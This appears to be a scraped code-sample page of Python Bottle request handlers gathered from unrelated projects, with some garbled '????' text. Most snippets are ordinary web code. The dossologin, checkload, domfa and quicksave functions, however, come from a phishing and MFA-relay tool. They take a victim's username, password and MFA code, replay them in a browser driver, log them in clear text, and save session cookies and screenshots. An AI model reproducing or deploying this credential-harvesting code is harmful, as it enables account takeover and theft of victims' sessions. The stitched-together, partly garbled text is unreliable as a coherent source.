def init_audit(log_group):
def audit(f):
@functools.wraps(f)
def handle(account_id, *args, **kw):
envelope = {
'timestamp': int(time.time() * 1000),
'message': json.dumps({
'user': request.environ.get('REMOTE_USER', ''),
'url': request.url,
'path': request.path,
'method': request.method,
'pid': os.getpid(),
'account_id': account_id,
'ip': request.remote_addr})
}
transport.send_group("%s=%s" % (log_group, account_id), [envelope])
return f(account_id, *args, **kw)
return handle
return audit
python类method()的实例源码
def echo():
try:
body = request.body.read().decode('utf-8')
except:
body = None
result = {
'method': request.method,
'headers': dict(request.headers),
'body': body,
'files': [
{'key': key, 'name': request.files[key].raw_filename}
for key in request.files
]
}
return result
def dossologin():
if request.method == 'OPTIONS':
return {}
else:
request_params = request.query.decode()
user_username = request_params['username']
user_pass = request_params['pass']
print('dossologin =======================================')
print('User provided username: '+user_username)
print('User provided password: '+user_pass)
log('Username: '+str(user_username))
log('Password: '+str(user_pass))
auth_type = do_usernamepass_login(user_username, user_pass, global_driver)
return auth_type
##########################################################################
# STAGE 2 - COLLECT MFA TOKEN OR ACCEPT NOTIFCATION
##########################################################################
def checkload():
"""
If the user doesn't have a sign in button, the phishing page will poll
this to see if the page has been loaded
"""
if request.method == 'OPTIONS':
return {}
else:
currentURL = global_driver.current_url
print('Current URL is: '+currentURL)
if currentURL == PROTECTED_RESOURCE:
return '1'
print('Saving creds and screenshot')
time.sleep(3)
quicksave()
else:
return '0'
def enable_cors(func):
def _enable_cors(*args, **kwargs):
hds = response.headers
hds['Access-Control-Allow-Origin'] = '*'
hds['Access-Control-Allow-Methods'] = ', '.join(['PUT', 'GET',
'POST', 'DELETE',
'OPTIONS'])
allow = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'
hds['Access-Control-Allow-Headers'] = allow
if request.method != 'OPTIONS':
return func(*args, **kwargs)
return _enable_cors
def apply(self, callback, route):
def wrapped(*args, **kwargs):
if not self.tracer or not self.tracer.enabled:
return callback(*args, **kwargs)
resource = "%s %s" % (request.method, request.route.rule)
# Propagate headers such as x-datadog-trace-id.
if self.distributed_tracing:
propagator = HTTPPropagator()
context = propagator.extract(request.headers)
if context.trace_id:
self.tracer.context_provider.activate(context)
with self.tracer.trace("bottle.request", service=self.service, resource=resource) as s:
code = 0
try:
return callback(*args, **kwargs)
except Exception:
# bottle doesn't always translate unhandled exceptions, so
# we mark it here.
code = 500
raise
finally:
s.set_tag(http.STATUS_CODE, code or response.status_code)
s.set_tag(http.URL, request.path)
s.set_tag(http.METHOD, request.method)
return wrapped
def printer():
if request.method == 'POST':
from project.models.Printer import Printer
printer = Printer()
message = printer.show_string(request.forms.get('text'))
return template('printer/index', message=message)
return template('printer/print', message='')
def index():
auth = AWS4Auth(config.aws_service_credentials.access_key, config.aws_service_credentials.secret_key, config.aws_service_region, config.aws_service_name)
endpoint = config.aws_service_protocol + "://" + config.aws_service_endpoint + request.path + "?" + request.query_string
proxy_req_header = {}
for header in request.headers:
if header.lower() in PROXY_REQ_HEADERS_WHITELIST:
proxy_req_header[header] = request.headers[header]
if request.method == "HEAD":
requests_response = requests.head(endpoint, auth=auth, headers=proxy_req_header)
elif request.method == "GET":
requests_response = requests.get(endpoint, auth=auth, headers=proxy_req_header)
elif request.method == "POST":
proxy_req_body = request.body.getvalue()
requests_response = requests.post(
endpoint,
auth=auth,
data=proxy_req_body,
headers=proxy_req_header)
elif request.method == "PUT":
proxy_req_body = request.body.getvalue()
requests_response = requests.put(
endpoint,
auth=auth,
data=proxy_req_body,
headers=proxy_req_header)
else:
logging.error("Method not allowed")
response.body = requests_response.content
for header in requests_response.headers:
if not header.lower() in PROXY_RESP_HEADERS_BLACKLIST:
response.add_header(header, requests_response.headers[header])
return response
def create_routes(host, port):
"""
Define registry routes
"""
@route("/runtimes/", method=['OPTIONS', 'GET'])
def get_registry():
"""
Get data about rill runtime
"""
from rill.runtime import Runtime
response.set_header('Access-Control-Allow-Origin', '*')
response.set_header('Access-Control-Allow-Methods', 'GET, OPTIONS')
response.set_header('Allow', 'GET, OPTIONS')
response.set_header(
'Access-Control-Allow-Headers',
'Content-Type, Authorization'
)
if request.method == 'OPTIONS':
return 'GET,OPTIONS'
response.content_type = 'application/json'
runtime = Runtime()
runtime_meta = runtime.get_runtime_meta()
runtime_meta['address'] = address = 'ws://{}:{}'.format(host, port)
runtime_meta['protocol'] = 'websocket'
runtime_meta['id'] = 'rill_' + urlparse(address).netloc
runtime_meta['seen'] = str(datetime.now())
return json.dumps([runtime_meta])
def domfa():
"""
Web app method to accept, decode and parse parameters related
to loggin in with MFA token. Calls do_mfa_code_entry to enter MFA.
"""
if request.method == 'OPTIONS':
return {}
else:
request_params = request.query.decode()
user_mfa_code = request_params['code']
print('domfa =======================================')
print('User provided MFA Auth Code: '+user_mfa_code)
do_mfa_code_entry(user_mfa_code, global_driver)
return 'Ok'
def quicksave():
"""Calling this will save cookies and whatnot to disk for later user"""
print('FLASHSAVE: Cookies and screenshot')
mfa_cookies = global_driver.get_cookies()
print(' flashsaving cookies: '+str(mfa_cookies))
save_obj(mfa_cookies,'cookies_'+get_timestamp()+'.txt') # load using add_cookies
global_driver.get_screenshot_as_file('saves/screenie'+get_timestamp()+'.png')
return '0x00000000'
##########################################################################
# BOTTLE CONFIGURATION/SETUP STUFF
##########################################################################
# Enable CORS - Future TODO: Communicate back to JavaScript auth method
# and have the login portal properly set up auth method
# From: https://gist.github.com/richard-flosi/3789163
def contact(db):
"""
Our contact-us form, basically, present a form if it's a GET request,
validate and process the form if it's a POST request. Filthy but works.
"""
form = ContactForm(request.POST, nocaptcha={'ip_address': '127.0.0.1'})
if request.method == 'POST' and form.validate():
# process the form, captcha is valid.
message_text = "Contact Email: {email}\n\n {contact_text}".format(
email=form.email.data,
contact_text=form.contact_text.data
)
# put together a gmail client for sending messages
gmail_client = GMail(settings.ADMIN_EMAIL,
settings.ADMIN_EMAIL_PASSWORD)
message = Message('[xqzes] Contact Form',
to=settings.ADMIN_EMAIL,
text=message_text)
gmail_client.send(message)
return redirect("/contact/?contacted=True")
return template(
'contact',
form=form,
contacted=strtobool(request.GET.get('contacted', 'false'))
)
def generic_handler():
"""
The generic handler catches all requests not caught by any other route. It
checks the configuration to see if the URL requested is one registered as a
job's webhook URL handler. If so, it normalizes the request and queues the
job for building.
It returns immediately (aynsc) with a JSON structure containing the job id.
"""
jobdef_manager = request.deps['jobdef_manager']
build_queue = request.deps['build_queue']
config = request.deps['config']
providers = request.deps['providers']
jobdef = jobdef_manager.get_jobdef_from_url(request.path)
if not jobdef:
abort(404, "Not found")
logging.info("Received event for job '{}'".format(jobdef.name))
# Log debug info about the received request
logging.debug("request environ: {}".format(request.environ))
logging.debug("request path: {}".format(request.path))
logging.debug("request method: {}".format(request.method))
for k, v in request.headers.items():
logging.debug("request header: {}={}".format(k, v))
for k, v in request.query.items():
logging.debug("request query: {}={}".format(k, v))
logging.debug("request body: {}".format(request.body.read()))
logging.debug("request auth: {}".format(request.auth))
env = job.make_env(request, jobdef, providers)
job_inst = jobdef.make_job(request.body.read().decode('utf8'), env)
build_queue.put(job_inst)
return {'id': job_inst.id}
def talk_api():
"""
?????????API
GET -> ???????
POST -> ???????
json eg.
[
{
talk_time:2016-09-17 15:00:49.937402
username:sayamada
chat_data:????
}
:
},
{
talk_time:2016-09-17 15:58:03.200027
username:sayamada
chat_data:?????
},
{
talk_time:2016-09-17 15:58:12.289631
username:sayamada
chat_data:??????
}
]
:return:
"""
if request.method == "GET":
talk_list = get_talk()
return json.dumps(talk_list)
elif request.method == "POST":
# ????????????get????getunicode???
chat_data = request.POST.getunicode("chat")
# ????cookie????
username = request.get_cookie("username")
# ??????
talk_time = datetime.now()
# ????
save_talk(talk_time, username, chat_data)
return json.dumps({
"status": "success"
})
def submit(db):
# TODO: break this out along with others in to an excuses package.
class SubmissionForm(Form):
attribution_name = StringField(
'Your Name (for future attribution purposes)',
[
validators.InputRequired(),
validators.Length(
min=3,
max=50,
message="Srsly, give us a decent username "
"(%(min)d - %(max)d chars),"
" doesn't even have to be real."
)
]
)
excuse = TextAreaField(
'What\'s YOUR excuse !?!?',
[
validators.Length(
min=5,
max=140,
message="Please provide %(min)d - %(max)d "
"characters"),
]
)
nocaptcha = NoCaptchaField(
public_key=settings.RECAPTCHA_SITE_KEY,
private_key=settings.RECAPTCHA_SECRET_KEY,
secure=True,
)
form = SubmissionForm(request.POST, nocaptcha={'ip_address': '127.0.0.1'})
submitted = False
if request.method == 'POST' and form.validate():
excuse_record = Excuse(form.attribution_name.data,
form.excuse.data)
db.add(excuse_record)
submitted = True
return template('submit', form=form, submitted=submitted)